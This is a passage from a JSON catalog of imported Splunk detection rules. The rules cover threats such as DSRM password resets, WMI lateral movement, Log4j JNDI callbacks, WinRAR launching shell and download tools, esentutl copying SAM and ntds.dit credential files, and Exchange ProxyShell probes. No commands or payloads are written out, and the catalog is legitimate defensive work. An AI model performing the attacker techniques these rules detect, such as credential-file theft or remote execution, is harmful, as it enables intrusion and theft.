
This detection methodology helps the Security Operations Center (SOC) by:\n\n* Identifying active exploitation attempts in real-time, allowing for quicker incident response.\n* Categorizing attack severity to prioritize remediation efforts based on risk level.\n* Providing visibility into attacker tactics, including source IP, attack techniques, and affected applications.\n* Generating risk-based scoring and contextual alerts to enhance decision-making within SOC workflows.\n* Helping analysts determine whether an attack was merely an attempt or if it successfully exploited a vulnerability.\n\nBy leveraging this information, SOC teams can proactively mitigate security threats, patch vulnerable applications, and enforce security controls to prevent further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/splunk-appdynamics-secure-application-alerts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d1a45d84-8dd1-4b31-8854-62b0b1d5da0b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/splunk_appdynamics_secure_application_alerts.yml" } }, { "id": "splunk-security-content-d1ab841c-36a6-46cf-b50f-b2b04b31182a", "type": "detection", "name": "Windows AD DSRM Password Reset", "description": "The following analytic detects attempts to reset the Directory Services Restore Mode (DSRM) administrator password on a Domain Controller. 
It leverages event code 4794 from the Windows Security Event Log, specifically looking for events where the DSRM password reset is attempted. This activity is significant because the DSRM account can be used similarly to a local administrator account, providing potential persistence for an attacker. If confirmed malicious, this could allow an attacker to maintain administrative access to the Domain Controller, posing a severe risk to the domain's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-dsrm-password-reset.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d1ab841c-36a6-46cf-b50f-b2b04b31182a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_dsrm_password_reset.yml" } }, { "id": "splunk-security-content-d1b088de-c47a-4572-9339-bdcc26493b32", "type": "detection", "name": "Linux Auditd Kernel Module Enumeration", "description": "The following analytic identifies the use of the 'kmod' process to list kernel modules on a Linux system. This detection leverages data from Linux Auditd, focusing on process names and command-line executions. While listing kernel modules is not inherently malicious, it can be a precursor to loading unauthorized modules using 'insmod'. 
If confirmed malicious, this activity could allow an attacker to load kernel modules, potentially leading to privilege escalation, persistence, or other malicious actions within the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082", "T1014" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-kernel-module-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d1b088de-c47a-4572-9339-bdcc26493b32", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_kernel_module_enumeration.yml" } }, { "id": "splunk-security-content-d1b74420-4cea-4752-a123-9b40dfcca49a", "type": "detection", "name": "Linux Auditd Dd File Overwrite", "description": "The following analytic detects the use of the 'dd' command to overwrite files on a Linux system. It leverages data from Linux Auditd telemetry, focusing on process execution logs that include command-line details. This activity is significant because adversaries often use the 'dd' command to destroy or irreversibly overwrite files, disrupting system availability and services. 
If confirmed malicious, this behavior could lead to data destruction, making recovery difficult and potentially causing significant operational disruptions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-dd-file-overwrite.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d1b74420-4cea-4752-a123-9b40dfcca49a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_dd_file_overwrite.yml" } }, { "id": "splunk-security-content-d1ff2e22-310d-446a-80b3-faedaa7b3b52", "type": "detection", "name": "Linux Auditd Whoami User Discovery", "description": "The following analytic detects the suspicious use of the whoami command, which may indicate an attacker trying to gather information about the current user account on a compromised system. The whoami command is commonly used to verify user privileges and identity, especially during initial stages of an attack to assess the level of access. 
By monitoring for unusual or unauthorized executions of whoami, this analytic helps in identifying potential reconnaissance activities, enabling security teams to take action before the attacker escalates privileges or conducts further malicious operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-whoami-user-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d1ff2e22-310d-446a-80b3-faedaa7b3b52", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_whoami_user_discovery.yml" } }, { "id": "splunk-security-content-d25d2c3d-d9d8-40ec-8fdf-e86fe155a3da", "type": "detection", "name": "Remote Process Instantiation via WMI", "description": "The following analytic detects the execution of wmic.exe with parameters to spawn a process on a remote system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process telemetry mapped to the `Processes` node of the `Endpoint` data model. This activity is significant as WMI can be abused for lateral movement and remote code execution, often used by adversaries and Red Teams. 
If confirmed malicious, this could allow attackers to execute arbitrary code on remote systems, facilitating further compromise and lateral spread within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remote-process-instantiation-via-wmi.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d25d2c3d-d9d8-40ec-8fdf-e86fe155a3da", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remote_process_instantiation_via_wmi.yml" } }, { "id": "splunk-security-content-d25feebe-fa1c-4754-8a1e-afb03bedc0f2", "type": "detection", "name": "Linux OpenVPN Privilege Escalation", "description": "The following analytic detects the execution of OpenVPN with elevated privileges, specifically when combined with the `--dev`, `--script-security`, `--up`, and `sudo` options. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process command-line arguments and execution details. This activity is significant because it indicates a potential privilege escalation attempt, allowing a user to execute system commands as root. 
If confirmed malicious, this could lead to full system compromise, enabling an attacker to gain root access and execute arbitrary commands with elevated privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-openvpn-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d25feebe-fa1c-4754-8a1e-afb03bedc0f2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_openvpn_privilege_escalation.yml" } }, { "id": "splunk-security-content-d290eeef-d05e-49a8-b598-72296023b87b", "type": "detection", "name": "Zoom Rare Input Devices", "description": "Detects rare input devices from Zoom logs. Actors performing Remote Employment Fraud (REF) typically use unusual device information compared to a majority of employees. 
Detecting this activity requires careful analysis, regular review, and a thorough understanding of the audio and video devices commonly used within your environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1123" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zoom-rare-input-devices.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d290eeef-d05e-49a8-b598-72296023b87b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/zoom_rare_input_devices.yml" } }, { "id": "splunk-security-content-d2988160-3ce9-4310-b59d-905334920cdd", "type": "detection", "name": "Windows Get Local Admin with FindLocalAdminAccess", "description": "The following analytic detects the execution of the `Find-LocalAdminAccess` cmdlet using PowerShell Script Block Logging (EventCode=4104). This cmdlet is part of PowerView, a toolkit for Windows domain enumeration. Identifying the use of `Find-LocalAdminAccess` is crucial as adversaries may use it to find machines where the current user has local administrator access, facilitating lateral movement or privilege escalation. 
If confirmed malicious, this activity could allow attackers to target and compromise additional systems within the network, significantly increasing their control and access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-get-local-admin-with-findlocaladminaccess.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d2988160-3ce9-4310-b59d-905334920cdd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_get_local_admin_with_findlocaladminaccess.yml" } }, { "id": "splunk-security-content-d2c14d28-5c47-11ec-9892-acde48001122", "type": "detection", "name": "Outbound Network Connection from Java Using Default Ports", "description": "The following analytic detects outbound network connections from Java processes to default ports used by the LDAP and RMI protocols, which may indicate exploitation of the Log4j vulnerability (CVE-2021-44228).\nThis detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and network traffic logs.\nMonitoring this activity is crucial as it can signify an attacker's attempt to perform JNDI lookups and retrieve malicious payloads.\nIf confirmed malicious, this activity could lead to remote code execution and further compromise of the affected server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", 
"T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/outbound-network-connection-from-java-using-default-ports.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d2c14d28-5c47-11ec-9892-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/outbound_network_connection_from_java_using_default_ports.yml" } }, { "id": "splunk-security-content-d2cef287-c2b7-4496-a609-7a548c1e27f9", "type": "detection", "name": "Windows Audit Policy Disabled via Legacy Auditpol", "description": "The following analytic identifies the execution of the legacy `auditpol.exe` included with the Windows 2000 Resource Kit Tools, with the \"/disable\" command-line argument or one of the allowed category flags and the \"none\" option, in order to disable a specific logging category from the audit policy. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity can be significant as it indicates potential defense evasion by adversaries or Red Teams, aiming to limit data that can be leveraged for detections and audits. 
If confirmed malicious, this behavior could allow attackers to bypass defenses, and plan further attacks, potentially leading to full machine compromise or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-audit-policy-disabled-via-legacy-auditpol.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d2cef287-c2b7-4496-a609-7a548c1e27f9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_audit_policy_disabled_via_legacy_auditpol.yml" } }, { "id": "splunk-security-content-d2d4af6a-6c2b-4d79-80c5-fc2cf12a2f68", "type": "detection", "name": "Windows Drivers Loaded by Signature", "description": "The following analytic identifies all drivers being loaded on Windows systems using Sysmon EventCode 6 (Driver Load). It leverages fields such as driver path, signature status, and hash to detect potentially suspicious drivers. This activity is significant for a SOC as malicious drivers can be used to gain kernel-level access, bypass security controls, or persist in the environment. 
If confirmed malicious, this activity could allow an attacker to execute arbitrary code with high privileges, leading to severe system compromise and potential data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1014", "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-drivers-loaded-by-signature.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d2d4af6a-6c2b-4d79-80c5-fc2cf12a2f68", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_drivers_loaded_by_signature.yml" } }, { "id": "splunk-security-content-d2f36034-37fa-4bd4-8801-26807c15540f", "type": "detection", "name": "WinRAR Spawning Shell Application", "description": "The following analytic detects the execution of Windows shell processes initiated by WinRAR, such as \"cmd.exe\", \"powershell.exe\", \"certutil.exe\", \"mshta.exe\", or \"bitsadmin.exe\". This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process relationships. This activity is significant because it may indicate exploitation of the WinRAR CVE-2023-38831 vulnerability, where malicious scripts are executed from spoofed ZIP archives. 
If confirmed malicious, this could lead to unauthorized access, financial loss, and further malicious activities like data theft or ransomware attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/winrar-spawning-shell-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d2f36034-37fa-4bd4-8801-26807c15540f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/winrar_spawning_shell_application.yml" } }, { "id": "splunk-security-content-d2f77901-dbfa-42d9-8af7-dcd0f1a50a2f", "type": "detection", "name": "Windows PowerShell MSIX Package Installation", "description": "The following analytic detects the execution of PowerShell commands to install unsigned AppX packages using Add-AppxPackage or Add-AppPackage cmdlets with the -AllowUnsigned flag. This detection leverages PowerShell Script Block Logging (EventCode=4104) to capture the full command content. This activity is significant as adversaries may use unsigned AppX packages to install malicious applications, bypass security controls, or establish persistence. 
If confirmed malicious, this could allow attackers to install unauthorized applications that may contain malware, backdoors, or other malicious components.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-msix-package-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d2f77901-dbfa-42d9-8af7-dcd0f1a50a2f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_msix_package_installation.yml" } }, { "id": "splunk-security-content-d2feef92-d54a-4a19-8306-b47c6ceba5b2", "type": "detection", "name": "Kubernetes Falco Shell Spawned", "description": "The following analytic detects instances where a shell is spawned within a Kubernetes container. Leveraging Falco, a cloud-native runtime security tool, this analytic monitors system calls within the Kubernetes environment and flags when a shell is spawned. This activity is significant for a SOC as it may indicate unauthorized access, allowing an attacker to execute arbitrary commands, manipulate container processes, or escalate privileges. 
If confirmed malicious, this could lead to data breaches, service disruptions, or unauthorized access to sensitive information, severely impacting the Kubernetes infrastructure's integrity and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-falco-shell-spawned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d2feef92-d54a-4a19-8306-b47c6ceba5b2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_falco_shell_spawned.yml" } }, { "id": "splunk-security-content-d308b0f1-edb7-4a62-a614-af321160710f", "type": "detection", "name": "AWS Defense Evasion Delete CloudWatch Log Group", "description": "The following analytic detects the deletion of CloudWatch log groups in AWS, identified through `DeleteLogGroup` events in CloudTrail logs. This detection leverages CloudTrail data to monitor for successful log group deletions, excluding console-based actions. This activity is significant as it indicates potential attempts to evade logging and monitoring, which is crucial for maintaining visibility into AWS activities. 
If confirmed malicious, this could allow attackers to hide their tracks, making it difficult to detect further malicious actions or investigate incidents within the compromised AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-defense-evasion-delete-cloudwatch-log-group.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d308b0f1-edb7-4a62-a614-af321160710f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_defense_evasion_delete_cloudwatch_log_group.yml" } }, { "id": "splunk-security-content-d31de944-4e61-468f-9154-e50690f0e99e", "type": "detection", "name": "Windows Chromium Process Launched with Logging Disabled", "description": "The following analytic detects instances of Chromium-based browser processes on Windows launched with logging disabled via command-line arguments such as --disable-logging and --disable-logging-redirect.\nThe --disable-logging flag forces browser logging to be disabled, while --disable-logging-redirect disables log redirection and is commonly used for testing or debugging scenarios.\nLogging is enabled by default in Chromium debug builds, making these flags more likely to appear in debug or development environments.\nWhile these options may be legitimately used by automation frameworks, debugging workflows, or isolated testing environments, they are also leveraged by malware and malicious scripts to evade security monitoring.\nAnalysts should review 
the parent process, full command-line parameters, and execution context to determine whether the behavior is expected or potentially suspicious.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1497" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-chromium-process-launched-with-logging-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d31de944-4e61-468f-9154-e50690f0e99e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_chromium_process_launched_with_logging_disabled.yml" } }, { "id": "splunk-security-content-d33aac9f-030c-4830-8701-0c2dd75bb6cb", "type": "detection", "name": "Windows Sqlservr Spawning Shell", "description": "This analytic detects instances where the sqlservr.exe process spawns a command shell (cmd.exe) or PowerShell process. 
This behavior is often indicative of command execution initiated from within the SQL Server process, potentially due to exploitation of SQL injection vulnerabilities or the use of extended stored procedures like xp_cmdshell.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sqlservr-spawning-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d33aac9f-030c-4830-8701-0c2dd75bb6cb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_sqlservr_spawning_shell.yml" } }, { "id": "splunk-security-content-d36459b1-7901-401a-a67e-44426c15b168", "type": "detection", "name": "Cisco Secure Firewall - React Server Components RCE Attempt", "description": "This analytic detects exploitation activity of CVE-2025-55182 using Cisco Secure Firewall Intrusion Events.\nIt leverages Cisco Secure Firewall Threat Defense IntrusionEvent logs to identify cases where Snort signature 65554 (React Server Components remote code execution attempt) is triggered.\nIf confirmed malicious, this behavior could be indicative of a potential exploitation of CVE-2025-55182.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": 
"detections/splunk-imports/_quarantine/cisco-secure-firewall-react-server-components-rce-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d36459b1-7901-401a-a67e-44426c15b168", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___react_server_components_rce_attempt.yml" } }, { "id": "splunk-security-content-d372f928-ce4f-11eb-a762-acde48001122", "type": "detection", "name": "Esentutl SAM Copy", "description": "The following analytic detects the use of `esentutl.exe` to access credentials stored in the ntds.dit or SAM file. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity is significant because it may indicate an attempt to extract sensitive credential information, which is a common tactic in lateral movement and privilege escalation. 
If confirmed malicious, this could allow an attacker to gain unauthorized access to user credentials, potentially compromising the entire network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esentutl-sam-copy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d372f928-ce4f-11eb-a762-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/esentutl_sam_copy.yml" } }, { "id": "splunk-security-content-d3f7a803-e802-448b-8eb2-e796b223bfff", "type": "detection", "name": "ConnectWise ScreenConnect Authentication Bypass", "description": "The following analytic detects attempts to exploit the ConnectWise ScreenConnect CVE-2024-1709 vulnerability, which allows attackers to bypass authentication via an alternate path or channel. It leverages web request logs to identify access to the SetupWizard.aspx page, indicating potential exploitation. This activity is significant as it can lead to unauthorized administrative access and remote code execution. If confirmed malicious, attackers could create administrative users and gain full control over the affected system, posing severe security risks. 
Immediate remediation by updating to version 23.9.8 or above is recommended.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/connectwise-screenconnect-authentication-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d3f7a803-e802-448b-8eb2-e796b223bfff", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/connectwise_screenconnect_authentication_bypass.yml" } }, { "id": "splunk-security-content-d3fffa37-492f-487b-a35d-c60fcb2acf01", "type": "detection", "name": "Detect Spike in blocked Outbound Traffic from your AWS", "description": "The following analytic identifies spikes in blocked outbound network connections originating from within your AWS environment. It leverages VPC Flow Logs data from CloudWatch, focusing on blocked actions from internal IP ranges to external destinations. This detection is significant as it can indicate potential exfiltration attempts or misconfigurations leading to data leakage. 
If confirmed malicious, such activity could allow attackers to bypass network defenses, leading to unauthorized data transfer or communication with malicious external entities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-spike-in-blocked-outbound-traffic-from-your-aws.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d3fffa37-492f-487b-a35d-c60fcb2acf01", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/detect_spike_in_blocked_outbound_traffic_from_your_aws.yml" } }, { "id": "splunk-security-content-d436f9e7-0ee7-4a47-864b-6dea2c4e2752", "type": "detection", "name": "Windows Exchange Autodiscover SSRF Abuse", "description": "This analytic identifies potential exploitation attempts of ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) and ProxyNotShell (CVE-2022-41040, CVE-2022-41082) vulnerabilities in Microsoft Exchange Server. The detection focuses on identifying the SSRF attack patterns used in these exploit chains. The analytic monitors for suspicious POST requests to /autodiscover/autodiscover.json endpoints that may indicate attempts to enumerate LegacyDN attributes as part of initial reconnaissance. It also detects requests containing X-Rps-CAT parameters that could indicate attempts to impersonate Exchange users and access the PowerShell backend. 
Additionally, it looks for MAPI requests that may be used to obtain user SIDs, along with suspicious user agents (particularly Python-based) commonly used in automated exploit attempts. If successful, these attacks can lead to remote code execution as SYSTEM, allowing attackers to deploy webshells, access mailboxes, or gain persistent access to the Exchange server and potentially the broader network environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-exchange-autodiscover-ssrf-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d436f9e7-0ee7-4a47-864b-6dea2c4e2752", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/windows_exchange_autodiscover_ssrf_abuse.yml" } }, { "id": "splunk-security-content-d441364c-349c-453b-b55f-12eccab67cf9", "type": "detection", "name": "O365 Excessive Authentication Failures Alert", "description": "The following analytic identifies an excessive number of authentication failures, including failed attempts against MFA prompt codes. It uses data from the `o365_management_activity` dataset, focusing on events where the authentication status is marked as failure. This behavior is significant as it may indicate a brute force attack or an attempt to compromise user accounts. 
